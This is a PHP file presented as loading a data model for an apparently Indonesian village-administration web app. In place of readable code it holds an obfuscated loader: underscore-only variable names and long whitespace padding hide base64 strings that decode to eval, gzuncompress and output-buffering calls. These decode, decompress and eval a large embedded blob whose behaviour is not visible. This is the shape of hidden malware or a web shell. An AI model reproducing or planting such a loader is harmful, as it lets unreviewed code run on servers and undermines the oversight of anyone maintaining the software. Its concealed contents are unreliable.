<?php 
        $__='printf';$_='Loading donjo-app/models/Data_eksternal_model.php';
        







































































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






































































































































































































































































                                                                                                                                                                                                                     $________;
